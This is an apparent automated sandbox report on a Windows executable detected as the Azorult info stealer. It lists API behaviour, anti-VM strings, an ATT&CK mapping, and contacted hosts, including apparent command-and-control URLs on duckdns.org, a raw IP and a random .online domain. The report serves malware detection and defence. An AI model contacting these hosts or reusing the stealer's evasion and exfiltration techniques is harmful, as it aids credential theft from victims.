                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00416740 GetSystemInfo,6_2_00416740
                Source: hfLfKDTosA.exe, 00000002.00000002.378337606.0000000005E70000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: hfLfKDTosA.exe, 00000002.00000002.378482424.0000000005F1C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: hfLfKDTosA.exe, 00000002.00000002.373381863.00000000011BB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW4L Gigabit Network Connection
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,6_2_00418124
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00407A34 mov eax, dword ptr fs:[00000030h]6_2_00407A34
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exeJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeProcess created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exeJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: GetLocaleInfoA,6_2_00404B4C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeQueries volume information: C:\Users\user\Desktop\hfLfKDTosA.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004065CC GetUserNameW,6_2_004065CC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,6_2_00404C15
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected AzorultShow sources
                Source: Yara matchFile source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY
                Source: Yara matchFile source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE
                Yara detected Azorult Info StealerShow sources
                Source: Yara matchFile source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY
                Source: Yara matchFile source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1Application Shimming1Process Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery24Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                hfLfKDTosA.exe23%VirustotalBrowse
                hfLfKDTosA.exe21%ReversingLabsByteCode-MSIL.Infostealer.Azorult

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.2.hfLfKDTosA.exe.400000.0.unpack100%AviraHEUR/AGEN.1108750Download File

                Domains

                SourceDetectionScannerLabelLink
                0k10dk21kkeok2e.online5%VirustotalBrowse
                chelseafc.map.fastly.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://0k10dk21kkeok2e.online/base/2930AD689ACFCD5F8337A7469C74A7E8.html5LNHfPcsLAdcjLZHzneYpPXNYfMw0%Avira URL Cloudsafe
                http://www.manutd.com40%Avira URL Cloudsafe
                https://dotbit.me/a/0%URL Reputationsafe
                https://dotbit.me/a/0%URL Reputationsafe
                https://dotbit.me/a/0%URL Reputationsafe
                https://uk.tigerwit.com/about/liverpool0%Avira URL Cloudsafe
                http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
                http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
                http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
                http://busch.duckdns.org/index.php0%Avira URL Cloudsafe
                http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
                http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
                http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
                https://tribus-watches.com/0%Avira URL Cloudsafe
                http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
                http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
                http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
                http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                http://0k10dk21kkeok2e.online/base/2930AD689ACFCD5F8337A7469C74A7E8.html0%Avira URL Cloudsafe
                http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
                http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
                http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
                https://www.tiktok.com/0%Avira URL Cloudsafe
                http://www.mancity.com40%Avira URL Cloudsafe
                http://o.ss2.us/00%URL Reputationsafe
                http://o.ss2.us/00%URL Reputationsafe
                http://o.ss2.us/00%URL Reputationsafe
                http://www.liverpoolfc.c0%Avira URL Cloudsafe
                http://195.245.112.115/index.php0%Avira URL Cloudsafe
                http://0k10dk21kkeok2e.online0%Avira URL Cloudsafe
                http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
                http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
                http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
                https://sdk.privacy-center.org/loader.js0%Avira URL Cloudsafe
                http://busch.duckdns.org/index.phpK0%Avira URL Cloudsafe
                http://busch.duckdns.org/index.phpg0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                0k10dk21kkeok2e.online
                		104.21.59.148
                		truefalseunknown
                chelseafc.map.fastly.net
                		151.101.2.133
                		truefalseunknown
                d2hhwit6pbhmvu.cloudfront.net
                		99.86.159.103
                		truefalse
                  		high
                  www.realmadrid.com
                  		unknown
                  		unknownfalse
                    		high
                    www.manutd.com
                    		unknown
                    		unknownfalse
                      		high
                      busch.duckdns.org
                      		unknown
                      		unknowntrue
                        		unknown
                        www.liverpoolfc.com
                        		unknown
                        		unknownfalse
                          		high
                          www.mancity.com
                          		unknown
                          		unknownfalse
                            		high
                            www.chelseafc.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://0k10dk21kkeok2e.online/base/2930AD689ACFCD5F8337A7469C74A7E8.htmlfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.liverpoolfc.com/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.jshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                  		high
                                  http://0k10dk21kkeok2e.online/base/2930AD689ACFCD5F8337A7469C74A7E8.html5LNHfPcsLAdcjLZHzneYpPXNYfMwhfLfKDTosA.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.mancity.com/base/hfLfKDTosA.exefalse
                                    		high
                                    http://www.manutd.com4hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_phfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                      		high
                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761aehfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                        		high
                                        https://ticketing.liverpoolfc.com/ClientRequiredFallback.aspx?view=Login&amp;next=%2fCrmDetails.aspxhfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.manutd.com/hfLfKDTosA.exefalse
                                            		high
                                            https://dotbit.me/a/hfLfKDTosA.exefalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.mitel.com/learn/case-studies/liverpool-football-clubhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                              		high
                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                		high
                                                https://uk.tigerwit.com/about/liverpoolhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.liverpoolfc.com/history/heyselhfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://www.liverpoolfc.com/my-lfc/login?fragment=&amp;referer=http://www.liverpoolfc.com/videohfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.acronis.com/en-gb/hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.mancity.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkXfhfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://faq.liverpoolfc.com/portal/homehfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.realmadrid.comhfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://ocsp.rootg2.amazontrust.com08hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=freehfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://busch.duckdns.org/index.phphfLfKDTosA.exe, 00000006.00000002.372044773.0000000000EF4000.00000004.00000020.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.levi.com/GB/en_GB/hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/hfLfKDTosA.exefalse
                                                                        		high
                                                                        http://www.liverpoolfc.comhfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_phfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/realmadridhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sca1b.amazontrust.com/sca1b.crl0hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.realmadrid.comhfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_phfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.liverpoolfc.com/loginhelphfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_phfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://www.snapchat.com/hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18achfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_phfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.realmadrid.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglhfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://tribus-watches.com/hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.liverpoolfc.com/legal/privacy-policyhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.mancity.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkXfLhfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://ocsp.sca1b.amazontrust.com06hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.liverpoolfc.com/legal/terms-and-conditionshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0hfLfKDTosA.exe, 00000002.00000002.378337606.0000000005E70000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.liverpoolfc.com/history/hillsboroughhfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://ocsp.rootca1.amazontrust.com0:hfLfKDTosA.exe, 00000002.00000002.378337606.0000000005E70000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://store.liverpoolfc.com/customer/account/login/hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.twitter.com/realmadridhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.chelseafc.comhfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.liverpoolfc.com/ticketshfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://members.liverpoolfc.com/loginhfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.liverpoolfc.comhfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootg2.amazontrust.com/rootg2.crl0hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.tiktok.com/hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://www.realmadrid.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkhfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.mancity.com4hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://o.ss2.us/0hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.liverpoolfc.chfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.liverpoolfc.com/accessible/accessiblehfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://schema.org/OrganizationhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.mancity.comhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.nike.com/gb/hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://195.245.112.115/index.phphfLfKDTosA.exe, 00000006.00000003.371615135.00000000029B0000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.liverpoolfc.com/membershiphfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.hcltech.com/unitedbyhclhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://0k10dk21kkeok2e.onlinehfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.verbier.ch/en/index.htm?reset=1hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.liverpoolfc.com/legal/cookieshfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.jshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.manutd.com/en/Help/AccessibilityhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.tourism-mauritius.muhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.youtube.com/manutdhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
